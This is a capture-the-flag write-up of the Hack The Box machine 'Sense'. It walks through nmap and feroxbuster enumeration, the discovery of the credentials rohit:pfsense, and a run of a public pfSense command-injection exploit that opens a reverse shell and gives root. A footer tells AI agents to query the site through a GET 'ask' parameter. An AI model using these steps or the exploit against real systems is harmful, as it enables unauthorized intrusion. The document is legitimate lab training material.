# Sense

## Enumeration

`sudo nmap -oA nmap-Sense -p- -A 10.10.10.60`

```
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open ssl/http lighttpd 1.4.35
|_http-title: Login
|_ssl-date: TLS randomness does not represent time
```

`searchsploit lighttpd 1.4`

```
Lighttpd 1.4.x - mod_userdir Information Disclosure | linux/remote/31396.txt
```

The LFI noted in the text file was very simple and did not work.

I see a pfsense login page; The ssl certificate shows no interesting info.

The default credentials did not work either.

I should find out the pfsense version really since this is the only attack vector here as it seems.

Still, I run a fuzz in the background:

`feroxbuster -k -u https://10.10.10.60/ -S 0,345`

A text file was found that indicates a vulnerable pfsense version:

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2FpiumQ95IZxe9vvHlPZeA%2Fimage.png?alt=media&#x26;token=c040d0eb-1c55-4868-be8d-20c5a3743328" alt=""><figcaption></figcaption></figure>

I read the hint that there must be another interesting text file, so I ran a very agressive web bruteforce, automating feroxbuster to use all web wordlists to search for text files recursively:

`for i in $(ls /usr/share/seclists/Discovery/Web-Content/); do feroxbuster -k -u https://10.10.10.60/ -w /usr/share/seclists/Discovery/Web-Content/$i -S 0,345 -x txt -d 6 -r -t 80; done >> feroxautomation.out`

I tried many wordlists, but could not find the file.

directory-list-2.3-medium finally contained:

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2FT8jWjC35dWpcKcIcQ5lH%2Fimage.png?alt=media&#x26;token=9add759d-08b3-4395-8afd-0600540480eb" alt=""><figcaption></figcaption></figure>

We got the user Rohit.

With rohit:pfsense I could log in and find out that the version of pfsense is 2.1.3-RELEASE

## Furthering Access

This one (from searchsploit) seems interesting regarding the given version:

```
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection /usr/share/exploitdb/exploits/php/webapps/43560.py CVE-2014-4688
```

`python3 exploit.py --rhost 10.10.10.60 --lhost 10.10.16.6 --lport 4444 --username rohit --password pfsense`

This did indeed work and we are root!


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://shibudocs.gitbook.io/htb-writeups/boxes-easy/sense.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.